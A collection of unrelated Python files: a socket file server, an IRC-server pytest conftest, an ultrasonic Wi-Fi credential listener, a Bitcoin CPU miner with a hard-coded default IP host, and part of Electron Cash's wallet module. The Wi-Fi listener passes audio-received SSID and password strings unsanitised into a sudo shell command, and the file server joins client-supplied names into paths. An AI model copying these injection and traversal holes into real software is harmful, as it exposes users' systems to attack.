Utils.send_message(conn, "upload successfully!")
elif op_type == PRIMITIVE.RECV_FILE.name:
path = os.path.join("server_mock_data_base", args[0])
if os.path.isfile(path):
Utils.send_message(conn, PRIMITIVE.SEND_FILE.name)
Utils.send_file(conn, path)
else:
Utils.send_message(conn, PRIMITIVE.SEND_INFO.name)
Utils.send_message(conn, path + " not found!")
elif op_type == PRIMITIVE.CHEK_LIST.name:
path = os.path.abspath("server_mock_data_base")
directory = os.listdir(path)
print(directory)
Utils.send_message(conn, PRIMITIVE.CHEK_LIST.name)
Utils.send_message(conn, " ".join(directory))
else:
info = Utils.recv_message(conn)
print(info)
Utils.send_message(conn, PRIMITIVE.SEND_INFO.name)
Utils.send_message(conn, "send "+info + " successfully!")
if info == "bye":
break
except socket.error as e:
print(e)
break
# self.threading_pool[index].join()
self.threading_pool.remove(threading.currentThread())
return
def start_server(self):
while True:
conn, addr = self.server.accept()
thread = threading.Thread(target=self.handler, args=(conn, len(self.threading_pool),), daemon=True)
self.threading_pool.append(thread)
thread.start()
def shut_down_server(self):
self.server.close()
return
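# Illustrative client sketch (not part of the original module). It only uses the
# Utils helpers and PRIMITIVE names exactly as the handler above does, and it
# assumes the server is reachable at the address hard-coded in Server.__init__.
def example_list_files(server_ip="192.168.220.131", server_port=60000):
    client = socket.socket()
    client.connect((server_ip, server_port))
    print(Utils.recv_message(client))  # welcome banner
    Utils.send_message(client, PRIMITIVE.CHEK_LIST.name)  # operation
    Utils.send_message(client, ".")  # args line (ignored for CHEK_LIST)
    if Utils.recv_message(client) == PRIMITIVE.CHEK_LIST.name:
        print(Utils.recv_message(client))  # space-separated file listing
    client.close()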
if __name__ == "__main__":
server = Server()
server.start_server()
|
conftest.py
|
import pytest
import threading
import traceback
import socket
from server import ConnectionListener
# fmt: off
motd_dict_test = {
"motd": [
"- Hello {user_nick}, this is a test MOTD!",
"-",
"- Foo",
"- Bar",
"- Baz",
"-",
"- End test MOTD"
]
}
# fmt: on
# Based on: https://gist.github.com/sbrugman/59b3535ebcd5aa0e2598293cfa58b6ab#gistcomment-3795790
@pytest.fixture
def fail_test_if_there_is_an_error_in_a_thread(monkeypatch):
last_exception = None
class ThreadWrapper(threading.Thread):
def run(self):
try:
super().run()
except Exception as e:
traceback.print_exc()
nonlocal last_exception
last_exception = e
monkeypatch.setattr(threading, "Thread", ThreadWrapper)
yield
if last_exception:
raise last_exception
@pytest.fixture
def run_server(fail_test_if_there_is_an_error_in_a_thread):
listener = ConnectionListener(6667, motd_dict_test)
def run_server():
try:
listener.run_server_forever()
except OSError:
return
threading.Thread(target=run_server).start()
yield
    # .shutdown() raises an OSError on macOS, but removing it makes the test suite freeze on Linux.
try:
listener.listener_socket.shutdown(socket.SHUT_RDWR)
except OSError:
pass
listener.listener_socket.close()
@pytest.fixture
def user_alice(run_server, helpers):
alice_socket = socket.socket()
alice_socket.connect(("localhost", 6667))
alice_socket.sendall(b"NICK Alice\r\n")
alice_socket.sendall(b"USER AliceUsr 0 * :Alice's real name\r\n")
# Receiving everything the server is going to send helps prevent errors.
# Otherwise it might not be fully started yet when the client quits.
while helpers.receive_line(alice_socket) != b":mantatail 376 Alice :End of /MOTD command\r\n":
pass
yield alice_socket
alice_socket.sendall(b"QUIT\r\n")
while b"QUIT" not in helpers.receive_line(alice_socket):
pass
alice_socket.close()
@pytest.fixture
def user_bob(run_server, helpers):
bob_socket = socket.socket()
bob_socket.connect(("localhost", 6667))
bob_socket.sendall(b"NICK Bob\r\n")
bob_socket.sendall(b"USER BobUsr 0 * :Bob's real name\r\n")
# Receiving everything the server is going to send helps prevent errors.
# Otherwise it might not be fully started yet when the client quits.
while helpers.receive_line(bob_socket) != b":mantatail 376 Bob :End of /MOTD command\r\n":
pass
yield bob_socket
bob_socket.sendall(b"QUIT\r\n")
while b"QUIT" not in helpers.receive_line(bob_socket):
pass
bob_socket.close()
@pytest.fixture
def user_charlie(run_server, helpers):
charlie_socket = socket.socket()
charlie_socket.connect(("localhost", 6667))
charlie_socket.sendall(b"NICK Charlie\r\n")
charlie_socket.sendall(b"USER CharlieUsr 0 * :Charlie's real name\r\n")
# Receiving everything the server is going to send helps prevent errors.
# Otherwise it might not be fully started yet when the client quits.
while helpers.receive_line(charlie_socket) != b":mantatail 376 Charlie :End of /MOTD command\r\n":
pass
yield charlie_socket
charlie_socket.sendall(b"QUIT\r\n")
while b"QUIT" not in helpers.receive_line(charlie_socket):
pass
charlie_socket.close()
# Based on https://stackoverflow.com/a/42156088/15382873
class Helpers:
@staticmethod
def receive_line(sock, timeout=1):
sock.settimeout(timeout)
received = b""
while not received.endswith(b"\r\n"):
received += sock.recv(1)
return received
    # Makes it easier to assert on received bytes whose word order is not guaranteed (e.g. replies built from sets).
@staticmethod
def compare_if_word_match_in_any_order(received_bytes, compare_with):
return set(received_bytes.split()) == set(compare_with.split())
@pytest.fixture
def helpers():
return Helpers
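# Example of how a test module would typically use these fixtures (a sketch
# only -- real tests belong in test_*.py files rather than conftest.py, and the
# exact reply asserted here is an assumption about the server, not something
# guaranteed by this file):
#
#   def test_alice_can_join_a_channel(user_alice, helpers):
#       user_alice.sendall(b"JOIN #foo\r\n")
#       assert b"JOIN" in helpers.receive_line(user_alice)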
|
listener.py
|
import os
import sys
if sys.version_info[0] < 3:
import Queue as queue
else:
import queue
import threading
import signal
import numpy
import pyaudio
from quiet.quiet import Decoder
class Listener(object):
def __init__(self):
self.pyaudio_instance = None
self.done = None
self.thread = None
def start(self):
self.done = False
if not (self.thread and self.thread.is_alive()):
self.thread = threading.Thread(target=self.run)
self.thread.start()
def run(self):
FORMAT = pyaudio.paFloat32
CHANNELS = 1
RATE = 44100
CHUNK = int(RATE / 10)
if not self.pyaudio_instance:
self.pyaudio_instance = pyaudio.PyAudio()
q = queue.Queue()
def callback(in_data, frame_count, time_info, status):
q.put(in_data)
return (None, pyaudio.paContinue)
stream = self.pyaudio_instance.open(format=FORMAT,
channels=CHANNELS,
rate=RATE,
input=True,
frames_per_buffer=CHUNK,
stream_callback=callback)
decoder = Decoder(profile_name='ultrasonic-experimental')
while not self.done:
audio = q.get()
audio = numpy.fromstring(audio, dtype='float32')
data = decoder.decode(audio)
if data is not None:
self.on_data(data)
stream.stop_stream()
def stop(self):
self.done = True
if self.thread and self.thread.is_alive():
self.thread.join()
def on_data(self, data):
print(data)
def main():
listener = Listener()
def on_data(data):
ssid_length = data[0]
ssid = data[1:ssid_length+1].tostring().decode('utf-8')
password = data[ssid_length+1:].tostring().decode('utf-8')
print('SSID: {}\nPassword: {}'.format(ssid, password))
if os.system('which nmcli >/dev/null') == 0:
cmd = 'sudo nmcli device wifi connect {} password {}'.format(ssid, password)
if os.system(cmd) == 0:
print('Wi-Fi is connected')
listener.stop()
else:
print('Failed')
else:
print('to do')
def int_handler(sig, frame):
listener.stop()
signal.signal(signal.SIGINT, int_handler)
listener.on_data = on_data
listener.run()
if __name__ == '__main__':
main()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '111.90.140.12'
if 'port' not in settings:
settings['port'] = 46261
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
wallet.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Wallet classes:
# - ImportedAddressWallet: imported address, no keystore
# - ImportedPrivkeyWallet: imported private keys, keystore
# - Standard_Wallet: one keystore, P2PKH
# - Multisig_Wallet: several keystores, P2SH
import copy
import errno
import json
import os
import queue
import random
import time
import threading
from collections import defaultdict
from functools import partial
from .i18n import ngettext
from .util import NotEnoughFunds, ExcessiveFee, PrintError, UserCancelled, profiler, format_satoshis, format_time, finalization_print_error, to_string
from .address import Address, Script, ScriptOutput, PublicKey, OpCodes
from .bitcoin import *
from .version import *
from .keystore import load_keystore, Hardware_KeyStore, Imported_KeyStore, BIP32_KeyStore, xpubkey_to_address
from . import networks
from . import keystore
from .storage import multisig_type, WalletStorage
from . import transaction
from .transaction import Transaction, InputValueMissing
from .plugins import run_hook
from . import bitcoin
from . import coinchooser
from .synchronizer import Synchronizer
from .verifier import SPV, SPVDelegate
from . import schnorr
from . import ecc_fast
from .blockchain import NULL_HASH_HEX
from . import paymentrequest
from .paymentrequest import InvoiceStore, PR_PAID, PR_UNPAID, PR_UNKNOWN, PR_EXPIRED
from .contacts import Contacts
from . import cashacct
from . import slp
def _(message): return message
TX_STATUS = [
_('Unconfirmed parent'),
_('Low fee'),
_('Unconfirmed'),
_('Not Verified'),
]
del _
from .i18n import _
DEFAULT_CONFIRMED_ONLY = False
def relayfee(network):
RELAY_FEE = 5000
MAX_RELAY_FEE = 50000
f = network.relay_fee if network and network.relay_fee else RELAY_FEE
return min(f, MAX_RELAY_FEE)
def dust_threshold(network):
# Change < dust threshold is added to the tx fee
#return 182 * 3 * relayfee(network) / 1000 # original Electrum logic
#return 1 # <-- was this value until late Sept. 2018
return 546 # hard-coded Bitcoin Cash dust threshold. Was changed to this as of Sept. 2018
def sweep_preparations(privkeys, network, imax=100):
class InputsMaxxed(Exception):
pass
def append_utxos_to_inputs(inputs, pubkey, txin_type):
if txin_type == 'p2pkh':
address = Address.from_pubkey(pubkey)
else:
address = PublicKey.from_pubkey(pubkey)
sh = address.to_scripthash_hex()
u = network.synchronous_get(('blockchain.scripthash.listunspent', [sh]))
for item in u:
if len(inputs) >= imax:
raise InputsMaxxed()
item['address'] = address
item['type'] = txin_type
item['prevout_hash'] = item['tx_hash']
item['prevout_n'] = item['tx_pos']
item['pubkeys'] = [pubkey]
item['x_pubkeys'] = [pubkey]
item['signatures'] = [None]
item['num_sig'] = 1
inputs.append(item)
def find_utxos_for_privkey(txin_type, privkey, compressed):
pubkey = bitcoin.public_key_from_private_key(privkey, compressed)
append_utxos_to_inputs(inputs, pubkey, txin_type)
keypairs[pubkey] = privkey, compressed
inputs = []
keypairs = {}
try:
for sec in privkeys:
txin_type, privkey, compressed = bitcoin.deserialize_privkey(sec)
find_utxos_for_privkey(txin_type, privkey, compressed)
# do other lookups to increase support coverage
if is_minikey(sec):
# minikeys don't have a compressed byte
# we lookup both compressed and uncompressed pubkeys
find_utxos_for_privkey(txin_type, privkey, not compressed)
elif txin_type == 'p2pkh':
# WIF serialization does not distinguish p2pkh and p2pk
# we also search for pay-to-pubkey outputs
find_utxos_for_privkey('p2pk', privkey, compressed)
elif txin_type == 'p2sh':
raise ValueError(_("The specified WIF key '{}' is a p2sh WIF key. These key types cannot be swept.").format(sec))
except InputsMaxxed:
pass
if not inputs:
raise ValueError(_('No inputs found. (Note that inputs need to be confirmed)'))
return inputs, keypairs
def sweep(privkeys, network, config, recipient, fee=None, imax=100, sign_schnorr=False):
inputs, keypairs = sweep_preparations(privkeys, network, imax)
total = sum(i.get('value') for i in inputs)
if fee is None:
outputs = [(TYPE_ADDRESS, recipient, total)]
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
fee = config.estimate_fee(tx.estimated_size())
if total - fee < 0:
raise NotEnoughFunds(_('Not enough funds on address.') + '\nTotal: %d satoshis\nFee: %d'%(total, fee))
if total - fee < dust_threshold(network):
raise NotEnoughFunds(_('Not enough funds on address.') + '\nTotal: %d satoshis\nFee: %d\nDust Threshold: %d'%(total, fee, dust_threshold(network)))
outputs = [(TYPE_ADDRESS, recipient, total - fee)]
locktime = network.get_local_height()
tx = Transaction.from_io(inputs, outputs, locktime=locktime, sign_schnorr=sign_schnorr)
tx.BIP_LI01_sort()
tx.sign(keypairs)
return tx
class Abstract_Wallet(PrintError, SPVDelegate):
"""
Wallet classes are created to handle various address generation methods.
Completion states (watching-only, single account, no seed, etc) are handled inside classes.
"""
max_change_outputs = 3
def __init__(self, storage):
self.electrum_version = PACKAGE_VERSION
self.storage = storage
self.thread = None # this is used by the qt main_window to store a QThread. We just make sure it's always defined as an attribute here.
self.network = None
# verifier (SPV) and synchronizer are started in start_threads
self.synchronizer = None
self.verifier = None
self.weak_window = None # Some of the GUI classes, such as the Qt ElectrumWindow, use this to refer back to themselves. This should always be a weakref.ref (Weak.ref), or None
# CashAccounts subsystem. Its network-dependent layer is started in
# start_threads. Note: object instantiation should be lightweight here.
# self.cashacct.load() is called later in this function to load data.
self.cashacct = cashacct.CashAcct(self)
self.slp = slp.WalletData(self)
finalization_print_error(self.cashacct) # debug object lifecycle
finalization_print_error(self.slp) # debug object lifecycle
# Removes defunct entries from self.pruned_txo asynchronously
self.pruned_txo_cleaner_thread = None
# Cache of Address -> (c,u,x) balance. This cache is used by
# get_addr_balance to significantly speed it up (it is called a lot).
# Cache entries are invalidated when tx's are seen involving this
        # address (address history changes). Entries to this cache are added
# only inside get_addr_balance.
# Note that this data structure is touched by the network and GUI
# thread concurrently without the use of locks, because Python GIL
# allows us to get away with such things. As such do not iterate over
# this dict, but simply add/remove items to/from it in 1-liners (which
# Python's GIL makes thread-safe implicitly).
self._addr_bal_cache = {}
# We keep a set of the wallet and receiving addresses so that is_mine()
# checks are O(logN) rather than O(N). This creates/resets that cache.
self.invalidate_address_set_cache()
self.gap_limit_for_change = 20 # constant
# saved fields
self.use_change = storage.get('use_change', True)
self.multiple_change = storage.get('multiple_change', False)
self.labels = storage.get('labels', {})
# Frozen addresses
frozen_addresses = storage.get('frozen_addresses',[])
self.frozen_addresses = set(Address.from_string(addr)
for addr in frozen_addresses)
# Frozen coins (UTXOs) -- note that we have 2 independent levels of "freezing": address-level and coin-level.
# The two types of freezing are flagged independently of each other and 'spendable' is defined as a coin that satisfies
# BOTH levels of freezing.
self.frozen_coins = set(storage.get('frozen_coins', []))
self.frozen_coins_tmp = set() # in-memory only
# address -> list(txid, height)
history = storage.get('addr_history',{})
self._history = self.to_Address_dict(history)
# there is a difference between wallet.up_to_date and interface.is_up_to_date()
# interface.is_up_to_date() returns true when all requests have been answered and processed
# wallet.up_to_date is true when the wallet is synchronized (stronger requirement)
self.up_to_date = False
# The only lock. We used to have two here. That was more technical debt
# without much purpose. 1 lock is sufficient. In particular data
# structures that are touched by the network thread as well as the GUI
# (such as self.transactions, history, etc) need to be synchronized
# using this mutex.
self.lock = threading.RLock()
# load requests
requests = self.storage.get('payment_requests', {})
for key, req in requests.items():
req['address'] = Address.from_string(key)
self.receive_requests = {req['address']: req
for req in requests.values()}
# Transactions pending verification. A map from tx hash to transaction
# height. Access is contended so a lock is needed. Client code should
# use get_unverified_tx to get a thread-safe copy of this dict.
self.unverified_tx = defaultdict(int)
# Verified transactions. Each value is a (height, timestamp, block_pos) tuple. Access with self.lock.
self.verified_tx = storage.get('verified_tx3', {})
# save wallet type the first time
if self.storage.get('wallet_type') is None:
self.storage.put('wallet_type', self.wallet_type)
# invoices and contacts
self.invoices = InvoiceStore(self.storage)
self.contacts = Contacts(self.storage)
# cashacct is started in start_threads, but it needs to have relevant
# data here, before the below calls happen
self.cashacct.load()
self.slp.load() # try to load first so we can pick up the remove_transaction hook from load_transactions if need be
# Now, finally, after object is constructed -- we can do this
self.load_keystore_wrapper()
self.load_addresses()
self.load_transactions()
self.build_reverse_history()
self.check_history()
if self.slp.need_rebuild:
# load failed, must rebuild from self.transactions
self.slp.rebuild()
self.slp.save() # commit changes to self.storage
# Print debug message on finalization
finalization_print_error(self, "[{}/{}] finalized".format(type(self).__name__, self.diagnostic_name()))
@classmethod
def to_Address_dict(cls, d):
        '''Convert a dict of strings to a dict of Address objects.'''
return {Address.from_string(text): value for text, value in d.items()}
@classmethod
def from_Address_dict(cls, d):
'''Convert a dict of Address objects to a dict of strings.'''
return {addr.to_storage_string(): value
for addr, value in d.items()}
def diagnostic_name(self):
return self.basename()
def __str__(self):
return self.basename()
def get_master_public_key(self):
return None
def load_keystore_wrapper(self):
""" Loads the keystore, but also tries to preserve derivation(s). Older
Electron Cash versions would not save the derivation for all keystore
types. So this function ensures:
1. That on first run, we store the keystore_derivations to top-level
storage (which is preserved always).
2. On subsequent runs we try and load the keystore_derivations from
storage and restore them if the individual keystore.derivation data
items were lost (because user loaded wallet with older Electron
Cash).
This function is provided to allow users to switch between old and new
EC versions. In the future if we deprecate the wallet format, or if
enough time has passed, this function may be removed and the simple
self.load_keystore() may be used instead. """
self.load_keystore()
if not hasattr(self, 'get_keystores'):
return
from .keystore import Deterministic_KeyStore, Old_KeyStore
keystores = self.get_keystores()
keystore_derivations = self.storage.get('keystore_derivations', [])
if len(keystore_derivations) != len(keystores):
keystore_derivations = [None] * len(keystores)
updated, updated_ks, updated_st = False, False, False
for i, keystore in enumerate(keystores):
if i == 0 and isinstance(keystore, Deterministic_KeyStore) and not keystore.seed_type:
# Attempt to update keystore.seed_type
if isinstance(keystore, Old_KeyStore):
keystore.seed_type = 'old'
updated_st = True
else:
# attempt to restore the seed_type based on wallet saved "seed_type"
typ = self.storage.get('seed_type')
if typ in ('standard', 'electrum'):
keystore.seed_type = 'electrum'
updated_st = True
elif typ == 'bip39':
keystore.seed_type = 'bip39'
updated_st = True
saved_der = keystore_derivations[i]
der = (keystore.has_derivation() and keystore.derivation) or None
if der != saved_der:
if der:
# keystore had a derivation, but top-level storage did not
# (this branch is typically taken on first run after
# restoring from seed or creating a new wallet)
keystore_derivations[i] = saved_der = der
updated = True
elif saved_der:
# we had a derivation but keystore did not. This branch is
# taken if the user has loaded this wallet with an older
# version of Electron Cash. Attempt to restore their
# derivation item in keystore.
                    keystore.derivation = saved_der  # write to keystore
updated_ks = True # tell it to re-save
if updated:
self.print_error("Updated keystore_derivations")
self.storage.put('keystore_derivations', keystore_derivations)
if updated_ks or updated_st:
if updated_ks:
self.print_error("Updated keystore (lost derivations restored)")
if updated_st:
self.print_error("Updated keystore (lost seed_type restored)")
self.save_keystore()
if any((updated, updated_ks, updated_st)):
self.storage.write()
@profiler
def load_transactions(self):
txi = self.storage.get('txi', {})
self.txi = {tx_hash: self.to_Address_dict(value)
for tx_hash, value in txi.items()
# skip empty entries to save memory and disk space
if value}
txo = self.storage.get('txo', {})
self.txo = {tx_hash: self.to_Address_dict(value)
for tx_hash, value in txo.items()
# skip empty entries to save memory and disk space
if value}
self.tx_fees = self.storage.get('tx_fees', {})
self.pruned_txo = self.storage.get('pruned_txo', {})
self.pruned_txo_values = set(self.pruned_txo.values())
tx_list = self.storage.get('transactions', {})
self.transactions = {}
for tx_hash, raw in tx_list.items():
tx = Transaction(raw)
self.transactions[tx_hash] = tx
if not self.txi.get(tx_hash) and not self.txo.get(tx_hash) and (tx_hash not in self.pruned_txo_values):
self.print_error("removing unreferenced tx", tx_hash)
self.transactions.pop(tx_hash)
self.cashacct.remove_transaction_hook(tx_hash)
self.slp.rm_tx(tx_hash)
@profiler
def save_transactions(self, write=False):
with self.lock:
tx = {}
for k,v in self.transactions.items():
tx[k] = str(v)
self.storage.put('transactions', tx)
txi = {tx_hash: self.from_Address_dict(value)
for tx_hash, value in self.txi.items()
# skip empty entries to save memory and disk space
if value}
txo = {tx_hash: self.from_Address_dict(value)
for tx_hash, value in self.txo.items()
# skip empty entries to save memory and disk space
if value}
self.storage.put('txi', txi)
self.storage.put('txo', txo)
self.storage.put('tx_fees', self.tx_fees)
self.storage.put('pruned_txo', self.pruned_txo)
history = self.from_Address_dict(self._history)
self.storage.put('addr_history', history)
self.slp.save()
if write:
self.storage.write()
def save_verified_tx(self, write=False):
with self.lock:
self.storage.put('verified_tx3', self.verified_tx)
self.cashacct.save()
if write:
self.storage.write()
def clear_history(self):
with self.lock:
self.txi = {}
self.txo = {}
self.tx_fees = {}
self.pruned_txo = {}
self.pruned_txo_values = set()
self.slp.clear()
self.save_transactions()
self._addr_bal_cache = {}
self._history = {}
self.tx_addr_hist = defaultdict(set)
self.cashacct.on_clear_history()
@profiler
def build_reverse_history(self):
self.tx_addr_hist = defaultdict(set)
for addr, hist in self._history.items():
for tx_hash, h in hist:
self.tx_addr_hist[tx_hash].add(addr)
@profiler
def check_history(self):
save = False
my_addrs = [addr for addr in self._history if self.is_mine(addr)]
for addr in set(self._history) - set(my_addrs):
self._history.pop(addr)
save = True
for addr in my_addrs:
hist = self._history[addr]
for tx_hash, tx_height in hist:
if tx_hash in self.pruned_txo_values or self.txi.get(tx_hash) or self.txo.get(tx_hash):
continue
tx = self.transactions.get(tx_hash)
if tx is not None:
self.add_transaction(tx_hash, tx)
save = True
if save:
self.save_transactions()
self.cashacct.save()
def basename(self):
return os.path.basename(self.storage.path)
def save_addresses(self):
addr_dict = {
'receiving': [addr.to_storage_string()
for addr in self.receiving_addresses],
'change': [addr.to_storage_string()
for addr in self.change_addresses],
}
self.storage.put('addresses', addr_dict)
def load_addresses(self):
d = self.storage.get('addresses', {})
if not isinstance(d, dict):
d = {}
self.receiving_addresses = Address.from_strings(d.get('receiving', []))
self.change_addresses = Address.from_strings(d.get('change', []))
def synchronize(self):
pass
def is_deterministic(self):
return self.keystore.is_deterministic()
def set_up_to_date(self, up_to_date):
with self.lock:
self.up_to_date = up_to_date
if up_to_date:
self.save_transactions()
# if the verifier is also up to date, persist that too;
# otherwise it will persist its results when it finishes
if self.verifier and self.verifier.is_up_to_date():
self.save_verified_tx()
self.storage.write()
def is_up_to_date(self):
with self.lock: return self.up_to_date
def is_fully_settled_down(self):
''' Returns True iff the wallet is up to date and its synchronizer
and verifier aren't busy doing work, and its pruned_txo_values list
is currently empty. This is used as a final check by the Qt GUI
to decide if it should do a final refresh of all tabs in some cases.'''
with self.lock:
ret = self.up_to_date
if ret and self.verifier:
ret = self.verifier.is_up_to_date()
if ret and self.synchronizer:
ret = self.synchronizer.is_up_to_date()
ret = ret and not self.pruned_txo_values
return bool(ret)
def set_label(self, name, text = None):
with self.lock:
if isinstance(name, Address):
name = name.to_storage_string()
changed = False
old_text = self.labels.get(name)
if text:
text = text.replace("\n", " ")
if old_text != text:
self.labels[name] = text
changed = True
else:
if old_text:
self.labels.pop(name)
changed = True
if changed:
run_hook('set_label', self, name, text)
self.storage.put('labels', self.labels)
return changed
def invalidate_address_set_cache(self):
''' This should be called from functions that add/remove addresses
from the wallet to ensure the address set caches are empty, in
particular from ImportedWallets which may add/delete addresses
thus the length check in is_mine() may not be accurate.
Deterministic wallets can neglect to call this function since their
address sets only grow and never shrink and thus the length check
of is_mine below is sufficient.'''
self._recv_address_set_cached, self._change_address_set_cached = frozenset(), frozenset()
def is_mine(self, address):
''' Note this method assumes that the entire address set is
composed of self.get_change_addresses() + self.get_receiving_addresses().
In subclasses, if that is not the case -- REIMPLEMENT this method! '''
assert not isinstance(address, str)
# assumption here is get_receiving_addresses and get_change_addresses
# are cheap constant-time operations returning a list reference.
# If that is not the case -- reimplement this function.
ra, ca = self.get_receiving_addresses(), self.get_change_addresses()
# Detect if sets changed (addresses added/removed).
# Note the functions that add/remove addresses should invalidate this
# cache using invalidate_address_set_cache() above.
if len(ra) != len(self._recv_address_set_cached):
# re-create cache if lengths don't match
self._recv_address_set_cached = frozenset(ra)
if len(ca) != len(self._change_address_set_cached):
# re-create cache if lengths don't match
self._change_address_set_cached = frozenset(ca)
# Do a 2 x O(logN) lookup using sets rather than 2 x O(N) lookups
# if we were to use the address lists (this was the previous way).
# For small wallets it doesn't matter -- but for wallets with 5k or 10k
        # addresses, it starts to add up since is_mine() is called frequently
# especially while downloading address history.
return (address in self._recv_address_set_cached
or address in self._change_address_set_cached)
def is_change(self, address):
assert not isinstance(address, str)
ca = self.get_change_addresses()
